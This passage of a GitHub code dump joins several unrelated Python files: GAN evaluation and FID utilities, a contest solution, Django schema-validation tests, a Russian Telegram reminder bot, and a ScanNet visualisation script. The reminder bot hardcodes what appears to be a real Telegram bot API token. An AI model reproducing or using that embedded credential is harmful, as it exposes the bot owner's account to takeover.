= np.load(path + \"Real_losses.npy\", allow_pickle=True)[iter]\n if train_set == \"CIFAR\":\n iter = 40000\n else:\n iter = 10000\n # Discriminator loss\n x2 = np.linspace(0, iter, Fake_losses.shape[0])\n y2 = np.array(Fake_losses)\n fake_loss = plt.plot(x2, y2, 'b--', label='Fake loss')\n x3 = np.linspace(0, iter, Real_losses.shape[0])\n y3 = np.array(Real_losses)\n real_loss = plt.plot(x3, y3, 'g--', label='Real loss')\n x4 = np.linspace(0, iter, Real_losses.shape[0])\n y4 = np.array(Real_losses) + np.array(Fake_losses)\n real_loss = plt.plot(x4, y4, 'm--', label='Discriminator loss')\n plt.title(title + 'Discriminator Loss')\n plt.xlabel('iteration')\n plt.ylabel('Discriminator Loss')\n plt.legend()\n plt.show()\n\n\ndef MKDIR(path):\n try:\n os.mkdir(path)\n except:\n pass\n\ndef get_best_model(train_set='FashionMNIST', iters=20):\n best_fid = 1e8\n which_GAN = \"DCGAN\"\n fid_dict = {}\n for i in 
range(iters):\n GAN = DCGAN(ResNet=False, train_set=train_set, iter=i)\n try:\n GAN.load()\n fid_dict[\"DCGAN_\"+train_set+\"{}\".format(i)] = GAN.best_fid\n if GAN.best_fid < best_fid:\n best_GAN = GAN\n best_fid = GAN.best_fid\n print(best_fid)\n which_GAN = \"DCGAN_\"+train_set+\"{}\".format(i)\n except:\n pass\n for i in range(iters):\n GAN = WGAN(ResNet=False, spectral_norm=False, train_set=train_set, iter=i)\n try:\n GAN.load()\n fid_dict[\"WGAN_\"+train_set+\"{}\".format(i)] = GAN.best_fid\n if GAN.best_fid < best_fid:\n best_GAN = GAN\n best_fid = GAN.best_fid\n print(best_fid)\n which_GAN = \"WGAN_\"+train_set+\"{}\".format(i)\n except:\n pass\n for i in range(iters):\n GAN = WGAN(ResNet=False, spectral_norm=True,\n train_set=train_set, iter=i)\n try:\n GAN.load()\n fid_dict[\"SN_WGAN_\"+train_set+\"{}\".format(i)] = GAN.best_fid\n if GAN.best_fid < best_fid:\n best_GAN = GAN\n best_fid = GAN.best_fid\n print(best_fid)\n which_GAN = \"SN_WGAN_\"+train_set+\"{}\".format(i)\n except:\n pass\n fid_dict[\"best_model\"] = which_GAN\n df = pd.DataFrame(fid_dict, index=[0])\n df.to_csv(train_set + \"_fid_results.csv\")\n\n return best_GAN, which_GAN, fid_dict\n\ndef get_results():\n d = {}\n root = 'checkpoint/'\n ganname = ['DCGAN_', 'WGAN_', 'WGAN_GP_', 'SN_WGAN_']\n dataset = ['MNIST_', 'FashionMNIST_', 'CIFAR_']\n for data in dataset:\n for gan in ganname:\n gan_ = []\n for i in range(10):\n path = root + gan + data + str(int(i)) + '/'\n checkpoint_G = torch.load(path + \"G.pth\")\n gan_.append(checkpoint_G[\"Best FID score\"])\n d[data+gan] = gan_\n df = pd.DataFrame(data=d)\n df.to_csv('results_fid.csv')\n\nif __name__ == '__main__':\n show_fid_score(train_set=\"CIFAR\", iter=40000)","repo_name":"Karl-Liu-ch/Pytorch_WGAN","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":10070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26613193023","text":"n = int(input())\nMOD = 998244353\n\nif n == 1:\n print(9)\n exit()\n\n\ncnt = 9\nfor i in range(1, n):\n sita = 2 ** (i - 1)\n ue = cnt - sita\n\n cnt = ue * 3 + sita * 2\n cnt %= MOD\n\nprint(cnt)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-242/C_1.py","file_name":"C_1.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13896756019","text":"from unittest.mock import patch\n\nimport pytest\nfrom rest_framework import serializers\n\nfrom zconnect._messages.message import Message\nfrom zconnect._messages.schemas import verify_message_schema\nfrom zconnect.util import exceptions\n\n\nclass BadDeserializer(serializers.Serializer):\n a_missing_field = serializers.CharField()\n\n\nclass GoodDeserializer(serializers.Serializer):\n test_int = serializers.IntegerField()\n test_string = serializers.CharField()\n\n\n@pytest.fixture(name=\"test_message\")\ndef fix_test_message(fakedevice):\n fakedevice.product.state_serializer_name = \"coolserializer\"\n fakedevice.product.save()\n\n message = Message(\n category=\"test_message\",\n body={\n \"state\": {\n \"reported\": {\n \"test_int\": 123,\n \"test_string\": \"abc\",\n }\n }\n },\n device=fakedevice,\n )\n\n return message\n\n\nclass TestVerifySchema:\n\n def test_no_state_error(self, test_message):\n \"\"\"no 'state' in message raises an error, independent of verifier being used or not\"\"\"\n test_message.body = {\"hello\": \"test\"}\n\n with 
pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_no_reported_error(self, test_message):\n \"\"\"no 'reported' in message state raises an error, independent of verifier being used or not\"\"\"\n test_message.body[\"state\"] = {\"hello\": \"test\"}\n\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_no_verifier_works(self, fakeproduct, test_message):\n \"\"\"No verifier set on the product\"\"\"\n\n fakeproduct.state_serializer_name = \"\"\n fakeproduct.save()\n\n verify_message_schema(test_message)\n\n # hack test\n with patch(\"zconnect._messages.schemas.logger.warning\", side_effect=NotImplementedError):\n with pytest.raises(NotImplementedError):\n verify_message_schema(test_message)\n\n @pytest.mark.parametrize(\"loc\", (\n # various valid entry points that all point to nonexistent things\n \"ofkpofkw3\",\n \"o3ko.omhoote\",\n \"o3ko.omhoote:abc\",\n ))\n def test_invalid_verifier_raises(self, fakeproduct, test_message, loc):\n \"\"\"Invalid callable used for product verifier name\"\"\"\n fakeproduct.state_serializer_name = loc\n fakeproduct.save()\n\n with pytest.raises(exceptions.BadMessageSchemaError) as e:\n verify_message_schema(test_message)\n\n assert \"Error loading schema\" in str(e.value)\n\n def test_with_verifier_wrong_serializer(self, test_message):\n \"\"\"Mock loading verifier which raises a validation error because the serializer is wrong\"\"\"\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=BadDeserializer):\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_with_verifier_wrong_data(self, test_message):\n \"\"\"Same, but the data is wrong\"\"\"\n\n test_message.body[\"state\"][\"reported\"] = {\n \"a\": \"b\",\n }\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=GoodDeserializer):\n with pytest.raises(exceptions.BadMessageSchemaError):\n verify_message_schema(test_message)\n\n def test_with_verifier_success(self, test_message):\n \"\"\"Correct deserializer + data format\"\"\"\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=GoodDeserializer):\n verify_message_schema(test_message)\n\n def test_nested_validate(self, test_message):\n \"\"\"Nested deserialization\"\"\"\n\n class OuterSerializer(serializers.Serializer):\n data = GoodDeserializer(required=True)\n tag = serializers.CharField()\n\n test_message.body[\"state\"][\"reported\"] = {\n \"tag\": \"chocolate\",\n \"data\": test_message.body[\"state\"][\"reported\"],\n }\n\n with patch(\"zconnect._messages.schemas.import_callable\", return_value=OuterSerializer):\n verify_message_schema(test_message)\n","repo_name":"zconnect-iot/zconnect-django","sub_path":"tests/brokers/test_schema_validation.py","file_name":"test_schema_validation.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29044708389","text":"#модули\r\nimport telebot\r\nfrom telebot import types\r\nimport time\r\nimport sqlite3\r\nbot = telebot.TeleBot('5348582930:AAE2KdROhTqjD7LoFlt5OSPtIDkn7l5jbW0')\r\n#вспомогательные массивы\r\nmsup=['/min','/day','/hour']\r\nm1sup=['/n','/notify']\r\nsup=[2,3,4]\r\nsup2=[5,6,7,8,9,0]\r\n\r\ndef error_format(message):\r\n\tbot.send_message(message.chat.id,'❌ Ошибка. Проверьте формат вашего напоминания! 
❌ Формат: \\n'\r\n\t\t\t\t\t\t\t\t\t '\\n'\r\n\t\t\t\t\t\t\t\t\t 'Напомни/напомнить/напоминание *ваш текст напоминания* через *число* единица измерения (час/день/минута)')\r\n\r\n#фильтры\r\nsymbols = [0,1,2,3,4,5,6,7,8,9,'0','1','2','3','4','5','6','7','8','9']\r\nalter=['напомни','напомнить','напоминание']\r\nhours=['час','часов','часа']\r\nmins=['минута','минут','минуты']\r\ndays=['день','дня','дни']\r\n#коннект к базе данных\r\n\r\nconn = sqlite3.connect('database.db',check_same_thread=False)\r\ncursor = conn.cursor()\r\n\r\n#работа с базой данных\r\n\r\ndef db_table_val(us_id,text):\r\n cursor.execute('INSERT INTO test (us_id, text) VALUES (?, ?)',\r\n (us_id,text))\r\n conn.commit()\r\n\r\ndef sql_carry(us_id, text):\r\n\tcheck = cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,))\r\n\tif check.fetchone() is None:\r\n\t\tdb_table_val(us_id, text)\r\n\telse:\r\n\t\tdelete = \"\"\"DELETE from test where us_id = ?\"\"\"\r\n\t\tcursor.execute(delete, (us_id,))\r\n\t\tconn.commit()\r\n\t\tdb_table_val(us_id, text)\r\n\r\n#начало работы бота\r\n@bot.message_handler(commands=['start'])\r\ndef welcome(message):\r\n\tmenu=types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tmenu1=types.KeyboardButton('⏱ Создать напоминание')\r\n\tmenu2 = types.KeyboardButton('⚙ Помощь по боту')\r\n\tmenu.add(menu1,menu2)\r\n\tbot.send_message(message.chat.id, '✉ Вас приветствует NotifyBot (бот-напоминание) ✉\\n', reply_markup=menu)\r\n\r\n#информация о боте\r\n@bot.message_handler(commands=['info'])\r\ndef help(message):\r\n\tbot.send_message(message.chat.id, '❓ Для того чтобы создать уведомление: \\n1) Введите команду /n или нажмите на кнопку клавиатуры \"Создать напоминание\" или используйте быстрое напоминание и введите данные о своем уведомлении в формате:\\n'\r\n\t\t\t\t\t\t\t\t\t '\\n'\r\n\t\t\t\t\t\t\t\t\t 'Напомни/напомнить/напоминание *ваш текст напоминания* через *число* единица измерения (минута/час/день). \\n'\r\n\t\t\t\t\t\t\t\t\t '\\n'\r\n\t\t\t\t\t\t\t\t\t '2)Введите текст уведомления. \\n3)Выберите единицу измерения. \\n4)Укажите количество минут/часов/дней. \\n'\r\n\t\t\t\t\t\t\t\t\t 'Команды бота: /info ; /start ; /n ')\r\n#создать уведомление 1 способ\r\n@bot.message_handler(commands=['n'])\r\ndef request_0(message):\r\n\tbot.send_message(message.chat.id, '🗒 О чем напомнить?')\r\n\tbot.register_next_step_handler(message,request)\r\n\r\n@bot.message_handler(content_types=['document','audio','photo'])\r\ndef error_type(message):\r\n\tbot.send_message(message.chat.id,'Я вас не понимаю! 
😔 Список команд бота: /info ; /start ; /n')\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef message_handler(message):\r\n\tmes=message.text.split(' ')\r\n\tif message.text == '⏱ Создать напоминание':\r\n\t\trequest_0(message)\r\n\telif message.text == '⚙ Помощь по боту':\r\n\t\thelp(message)\r\n\telif mes[0].lower() in alter:\r\n\t\tif 'через' not in mes:\r\n\t\t\terror_format(message)\r\n\t\telif mes.index('через')==len(mes)-1:\r\n\t\t\terror_format(message)\r\n\t\telse:\r\n\t\t\thours = ['час', 'часов', 'часа']\r\n\t\t\tmins = ['минута', 'минут', 'минуты', 'минуту']\r\n\t\t\tdays = ['день', 'дня', 'дни']\r\n\t\t\tus_id = message.from_user.id\r\n\t\t\ttext=''\r\n\t\t\tmes.remove(mes[0])\r\n\t\t\tnum=mes.index('через')\r\n\t\t\tif num+1==len(mes)-1:\r\n\t\t\t\terror_format(message)\r\n\t\t\telif mes[num+2] not in days and mes[num+2] not in mins and mes[num+2] not in hours:\r\n\t\t\t\terror_format(message)\r\n\t\t\telse:\r\n\t\t\t\tfor i in range(0,num):\r\n\t\t\t\t\ttext=text+' '+mes[i]\r\n\t\t\t\t\tsql_carry(us_id,text)\r\n\t\t\t\tfor i in range(num+1,len(mes)):\r\n\t\t\t\t\thours = ['час', 'часов', 'часа']\r\n\t\t\t\t\tmins = ['минута', 'минут', 'минуты','минуту']\r\n\t\t\t\t\tdays = ['день', 'дня', 'дни']\r\n\t\t\t\t\tif mes[i] in hours:\r\n\t\t\t\t\t\tdef hours_alter(mes,num):\r\n\t\t\t\t\t\t\tfor i in range(num+1,len(mes)):\r\n\t\t\t\t\t\t\t\tif mes[num+1] in symbols or int(mes[num+1])%10 in symbols:\r\n\t\t\t\t\t\t\t\t\tkolvo_=int(mes[num+1])\r\n\t\t\t\t\t\t\t\t\tus_id = message.from_user.id\r\n\t\t\t\t\t\t\t\t\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\t\t\t\t\t\t\t\t\treqq = value[1]\r\n\t\t\t\t\t\t\t\t\tif kolvo_ == 1:\r\n\t\t\t\t\t\t\t\t\t\tend = 'час'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ in sup:\r\n\t\t\t\t\t\t\t\t\t\tend = 'часа'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ > 4 and kolvo_ < 20 or kolvo_ // 10 > 1 and kolvo_ % 10 in sup2:\r\n\t\t\t\t\t\t\t\t\t\tend = 'часов'\r\n\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\tend = 'часов'\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t '💬 Напоминание успешно создано. Я напомню вам о' + str(reqq) + ' через ' + str(kolvo_) + ' ' + str(\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t end) + '!')\r\n\t\t\t\t\t\t\t\t\ttime.sleep(kolvo_ * 60 * 60)\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id, text='🔔 Время для' + reqq + '!')\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\terror_format(message)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\thours_alter(mes, num)\r\n\t\t\t\t\telif mes[i] in mins:\r\n\t\t\t\t\t\tdef mins_alter(mes,num):\r\n\t\t\t\t\t\t\tfor i in range(num+1,len(mes)):\r\n\t\t\t\t\t\t\t\tif mes[num+1] in symbols or int(mes[num+1])%10 in symbols:\r\n\t\t\t\t\t\t\t\t\tkolvo_=int(mes[num+1])\r\n\t\t\t\t\t\t\t\t\tus_id = message.from_user.id\r\n\t\t\t\t\t\t\t\t\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\t\t\t\t\t\t\t\t\treqq = value[1]\r\n\t\t\t\t\t\t\t\t\tif kolvo_ == 1:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минуту'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ in sup:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минуты'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ > 4 and kolvo_ < 20 or kolvo_ // 10 > 1 and kolvo_ % 10 in sup2:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минут'\r\n\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\tend = 'минуты'\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t '💬 Напоминание успешно создано. 
Я напомню вам о' + str(reqq) + ' через ' + str(kolvo_) + ' ' + str(\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t end) + '!')\r\n\t\t\t\t\t\t\t\t\ttime.sleep(kolvo_ * 60)\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id, text='🔔 Время для' + reqq + '!')\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\terror_format(message)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tmins_alter(mes,num)\r\n\t\t\t\t\telif mes[i] in days:\r\n\t\t\t\t\t\tdef days_alter(mes,num):\r\n\t\t\t\t\t\t\tfor i in range(num + 1, len(mes)):\r\n\t\t\t\t\t\t\t\tif mes[num + 1] in symbols or int(mes[num+1])%10 in symbols:\r\n\t\t\t\t\t\t\t\t\tkolvo_ = int(mes[num + 1])\r\n\t\t\t\t\t\t\t\t\tus_id = message.from_user.id\r\n\t\t\t\t\t\t\t\t\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\t\t\t\t\t\t\t\t\treqq = value[1]\r\n\t\t\t\t\t\t\t\t\tif kolvo_ == 1:\r\n\t\t\t\t\t\t\t\t\t\tend = 'день'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ in sup:\r\n\t\t\t\t\t\t\t\t\t\tend = 'дня'\r\n\t\t\t\t\t\t\t\t\telif kolvo_ > 4 and kolvo_ < 20 or kolvo_ // 10 > 1 and kolvo_ % 10 in sup2:\r\n\t\t\t\t\t\t\t\t\t\tend = 'дней'\r\n\t\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\t\tend = 'дней'\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t '💬 Напоминание успешно создано. Я напомню вам о' + str(reqq) + ' через ' + str(kolvo_) + ' ' + str(\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t end) + '!')\r\n\t\t\t\t\t\t\t\t\ttime.sleep(kolvo_ * 60 * 24 * 60)\r\n\t\t\t\t\t\t\t\t\tbot.send_message(message.chat.id, text='🔔 Время для' + reqq + '!')\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\terror_format(message)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\tdays_alter(mes,num)\r\n\telse:\r\n\t\tbot.send_message(message.chat.id,'Я вас не понимаю! 
😔 Список команд бота: /info ; /start ; /n')\r\n\r\ndef request(message):\r\n\r\n\t#получение текста уведомления и отправка его в базу данных\r\n\r\n\treq_ = message.text\r\n\ttext = req_\r\n\tus_id = message.from_user.id\r\n\tsql_carry(us_id,text)\r\n\r\n\t#фильтр на команды\r\n\r\n\tif req_=='/start':\r\n\t\twelcome(message)\r\n\telif req_ in m1sup:\r\n\t\trequest_0(message)\r\n\telif req_=='⚙ Помощь по боту' or req_=='/info':\r\n\t\thelp(message)\r\n\telif req_=='⏱ Создать напоминание':\r\n\t\trequest_0(message)\r\n\telse:\r\n\t\tkeyboard_(message)\r\n\t\t# вывод клавиатуры\r\ndef keyboard_(message):\r\n\tkeyboard_1 = '🕒 Выберите единицу времени:'\r\n\tkeyboard = types.InlineKeyboardMarkup()\r\n\tkey_hour = types.InlineKeyboardButton(text='Минуты', callback_data='min')\r\n\tkey_min = types.InlineKeyboardButton(text='Часы', callback_data='hour')\r\n\tkey_day = types.InlineKeyboardButton(text='Дни', callback_data='days')\r\n\tkeyboard.add(key_min, key_hour, key_day)\r\n\tbot.send_message(message.chat.id, text=keyboard_1, reply_markup=keyboard)\r\n\r\n\r\n#определение единицы измерения исходя из call.data\r\n\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef choose_1(call):\r\n\tif call.data=='min':\r\n\t\tbot.send_message(call.message.chat.id,'Введите целое количество минут.')\r\n\t\tbot.register_next_step_handler(call.message, mins)\r\n\telif call.data=='hour':\r\n\t\tbot.send_message(call.message.chat.id,'Введите целое количество часов.')\r\n\t\tbot.register_next_step_handler(call.message, hour)\r\n\telif call.data == 'days':\r\n\t\tbot.send_message(call.message.chat.id, 'Введите целое количество дней.')\r\n\t\tbot.register_next_step_handler(call.message, day)\r\n#основная часть - бот засыпает на определенное время\r\ndef mins(call):\r\n\ttext = call.text\r\n\tfor i in text:\r\n\t\tif i not in symbols:\r\n\t\t\tdef error(message):\r\n\t\t\t\tbot.send_message(message.chat.id, '❌ Ошибка. Введите целое количество минут. ❌')\r\n\t\t\t\tkeyboard_(message)\r\n\t\t\terror(call)\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tmins_1(call)\r\n\t\t\tbreak\r\ndef mins_1(call):\r\n\tus_id=call.from_user.id\r\n\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\treqq=value[1]\r\n\ttext = call.text\r\n\tif text=='1':\r\n\t\tend='минуту'\r\n\telif int(text) in sup:\r\n\t\tend='минуты'\r\n\telif int(text)>4 and int(text)<20 or int(text)//10>1 and int(text)%10 in sup2:\r\n\t\tend='минут'\r\n\telse:\r\n\t\tend='минуты'\r\n\tkolvo=int(text)\r\n\tbot.send_message(call.chat.id, '💬 Напоминание успешно создано. Я напомню вам о '+str(reqq)+' через '+str(kolvo)+' '+str(end)+'!')\r\n\ttime.sleep(kolvo*60)\r\n\tbot.send_message(call.chat.id,text='🔔 Время для '+reqq+'!')\r\n\r\n\r\ndef hour(call):\r\n\talpha = [chr(ord(\"А\") + i) for i in range(32)]\r\n\talpha1 = [chr(i) for i in range(65, 91)]\r\n\ttext = call.text\r\n\tfor i in text:\r\n\t\tif i.upper() in alpha or i.upper() in alpha1:\r\n\t\t\tdef error(message):\r\n\t\t\t\tbot.send_message(message.chat.id, '❌ Ошибка. Введите целое количество часов. 
❌')\r\n\t\t\t\tkeyboard_(message)\r\n\t\t\terror(call)\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\thour_1(call)\r\n\t\t\tbreak\r\ndef hour_1(call):\r\n\tus_id=call.from_user.id\r\n\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\treqq=value[1]\r\n\ttext = call.text\r\n\tif text == '1':\r\n\t\tend = 'час'\r\n\telif int(text) in sup:\r\n\t\tend = 'часа'\r\n\telif int(text) > 4 and int(text) < 20 or int(text) // 10 > 1 and int(text) % 10 in sup2:\r\n\t\tend = 'часов'\r\n\telse:\r\n\t\tend = 'часов'\r\n\tkolvo = int(text)\r\n\tbot.send_message(call.chat.id, '💬 Напоминание успешно создано. Я напомню вам о ' + str(reqq) + ' через ' + str(kolvo) + ' ' + str(end) + '!')\r\n\ttime.sleep(kolvo * 60 * 60)\r\n\tbot.send_message(call.chat.id,text='🔔 Время для '+reqq+'!')\r\n\r\n\r\ndef day(call):\r\n\talpha = [chr(ord(\"А\") + i) for i in range(32)]\r\n\talpha1 = [chr(i) for i in range(65, 91)]\r\n\ttext = call.text\r\n\tfor i in text:\r\n\t\tif i.upper() in alpha or i.upper() in alpha1:\r\n\t\t\tdef error(message):\r\n\t\t\t\tbot.send_message(message.chat.id, '❌ Ошибка. Введите целое количество дней. ❌')\r\n\t\t\t\tkeyboard_(message)\r\n\t\t\terror(call)\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tday_1(call)\r\n\t\t\tbreak\r\ndef day_1(call):\r\n\tus_id=call.from_user.id\r\n\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\treqq=value[1]\r\n\ttext = call.text\r\n\tif text == '1':\r\n\t\tend = 'день'\r\n\telif int(text) in sup:\r\n\t\tend = 'дня'\r\n\telif int(text) > 4 and int(text) < 20 or int(text) // 10 > 1 and int(text) % 10 in sup2:\r\n\t\tend = 'дней'\r\n\telse:\r\n\t\tend = 'дней'\r\n\tkolvo = int(text)\r\n\tbot.send_message(call.chat.id,'💬 Напоминание успешно создано. Я напомню вам о ' + str(reqq) + ' через ' + str(kolvo) + ' ' + str(end) + '!')\r\n\ttime.sleep(kolvo * 24 * 60 * 60)\r\n\tbot.send_message(call.chat.id, text='🔔 Время для '+reqq+'!')\r\nbot.infinity_polling(timeout=10, long_polling_timeout = 5)\r\n","repo_name":"defmaxim/Telegram-Notify-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13316,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10477986761","text":"import numpy as np\nimport os, glob, argparse\nimport torch\nfrom operator import itemgetter\nimport cv2\nimport open3d as o3d\nimport glob\n\nCOLOR_DETECTRON2 = np.array(\n [\n 0.000, 0.447, 0.741,\n 0.850, 0.325, 0.098,\n 0.929, 0.694, 0.125,\n 0.494, 0.184, 0.556,\n 0.466, 0.674, 0.188,\n 0.301, 0.745, 0.933,\n 0.635, 0.078, 0.184,\n # 0.300, 0.300, 0.300,\n 0.600, 0.600, 0.600,\n 1.000, 0.000, 0.000,\n 1.000, 0.500, 0.000,\n 0.749, 0.749, 0.000,\n 0.000, 1.000, 0.000,\n 0.000, 0.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.333, 0.333, 0.000,\n 0.333, 0.667, 0.000,\n 0.333, 1.000, 0.000,\n 0.667, 0.333, 0.000,\n 0.667, 0.667, 0.000,\n 0.667, 1.000, 0.000,\n 1.000, 0.333, 0.000,\n 1.000, 0.667, 0.000,\n 1.000, 1.000, 0.000,\n 0.000, 0.333, 0.500,\n 0.000, 0.667, 0.500,\n 0.000, 1.000, 0.500,\n 0.333, 0.000, 0.500,\n 0.333, 0.333, 0.500,\n 0.333, 0.667, 0.500,\n 0.333, 1.000, 0.500,\n 0.667, 0.000, 0.500,\n 0.667, 0.333, 0.500,\n 0.667, 0.667, 0.500,\n 0.667, 1.000, 0.500,\n 1.000, 0.000, 0.500,\n 1.000, 0.333, 0.500,\n 1.000, 0.667, 0.500,\n 1.000, 1.000, 0.500,\n 0.000, 0.333, 1.000,\n 0.000, 0.667, 1.000,\n 0.000, 1.000, 1.000,\n 0.333, 0.000, 1.000,\n 0.333, 0.333, 1.000,\n 0.333, 0.667, 1.000,\n 0.333, 1.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.667, 0.333, 1.000,\n 0.667, 0.667, 
1.000,\n 0.667, 1.000, 1.000,\n 1.000, 0.000, 1.000,\n 1.000, 0.333, 1.000,\n 1.000, 0.667, 1.000,\n # 0.333, 0.000, 0.000,\n 0.500, 0.000, 0.000,\n 0.667, 0.000, 0.000,\n 0.833, 0.000, 0.000,\n 1.000, 0.000, 0.000,\n 0.000, 0.167, 0.000,\n # 0.000, 0.333, 0.000,\n 0.000, 0.500, 0.000,\n 0.000, 0.667, 0.000,\n 0.000, 0.833, 0.000,\n 0.000, 1.000, 0.000,\n 0.000, 0.000, 0.167,\n # 0.000, 0.000, 0.333,\n 0.000, 0.000, 0.500,\n 0.000, 0.000, 0.667,\n 0.000, 0.000, 0.833,\n 0.000, 0.000, 1.000,\n # 0.000, 0.000, 0.000,\n 0.143, 0.143, 0.143,\n 0.857, 0.857, 0.857,\n # 1.000, 1.000, 1.000\n ]).astype(np.float32).reshape(-1, 3) * 255\n\nSEMANTIC_IDXS = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 16, 24, 28, 33, 34, 36, 39])\nSEMANTIC_NAMES = np.array(['wall', 'floor', 'cabinet', 'bed', 'chair', 'sofa', 'table', 'door', 'window', 'bookshelf', 'picture', 'counter',\n 'desk', 'curtain', 'refridgerator', 'shower curtain', 'toilet', 'sink', 'bathtub', 'otherfurniture'])\nCLASS_COLOR = {\n 'unannotated': [0, 0, 0],\n 'floor': [143, 223, 142],\n 'wall': [171, 198, 230],\n 'cabinet': [0, 120, 177],\n 'bed': [255, 188, 126],\n 'chair': [189, 189, 57],\n 'sofa': [144, 86, 76],\n 'table': [255, 152, 153],\n 'door': [222, 40, 47],\n 'window': [197, 176, 212],\n 'bookshelf': [150, 103, 185],\n 'picture': [200, 156, 149],\n 'counter': [0, 190, 206],\n 'desk': [252, 183, 210],\n 'curtain': [219, 219, 146],\n 'refridgerator': [255, 127, 43],\n 'bathtub': [234, 119, 192],\n 'shower curtain': [150, 218, 228],\n 'toilet': [0, 160, 55],\n 'sink': [110, 128, 143],\n 'otherfurniture': [80, 83, 160]\n}\nSEMANTIC_IDX2NAME = {1: 'wall', 2: 'floor', 3: 'cabinet', 4: 'bed', 5: 'chair', 6: 'sofa', 7: 'table', 8: 'door', 9: 'window', 10: 'bookshelf', 11: 'picture',\n 12: 'counter', 14: 'desk', 16: 'curtain', 24: 'refridgerator', 28: 'shower curtain', 33: 'toilet', 34: 'sink', 36: 'bathtub', 39: 'otherfurniture'}\n\n\ndef get_coords_color(opt):\n input_file = os.path.join(opt.data_path, opt.data_split, opt.room_name + '_inst_nostuff.pth')\n assert os.path.isfile(input_file), 'File not exist - {}.'.format(input_file)\n if opt.data_split == 'test':\n xyz, rgb = torch.load(input_file)\n else:\n xyz, rgb, label, inst_label = torch.load(input_file)\n\n rgb = (rgb + 1) * 127.5\n\n if (opt.task == 'semantic_gt'):\n assert opt.data_split != 'test'\n label = label.astype(np.int)\n label_rgb = np.zeros(rgb.shape)\n label_rgb[label >= 0] = np.array(itemgetter(*SEMANTIC_NAMES[label[label >= 0]])(CLASS_COLOR))\n rgb = label_rgb\n\n elif (opt.task == 'semantic_pred'):\n assert opt.data_split != 'train'\n semantic_file = os.path.join(opt.prediction_path, opt.data_split, 'semantic', opt.room_name + '.npy')\n assert os.path.isfile(semantic_file), 'No semantic result - {}.'.format(semantic_file)\n label_pred = np.load(semantic_file).astype(np.int) # 0~19\n label_pred_rgb = np.array(itemgetter(*SEMANTIC_NAMES[label_pred])(CLASS_COLOR))\n rgb = label_pred_rgb\n\n elif (opt.task == 'offset_semantic_pred'):\n assert opt.data_split != 'train'\n semantic_file = os.path.join(opt.prediction_path, opt.data_split, 'semantic', opt.room_name + '.npy')\n assert os.path.isfile(semantic_file), 'No semantic result - {}.'.format(semantic_file)\n label_pred = np.load(semantic_file).astype(np.int) # 0~19\n label_pred_rgb = 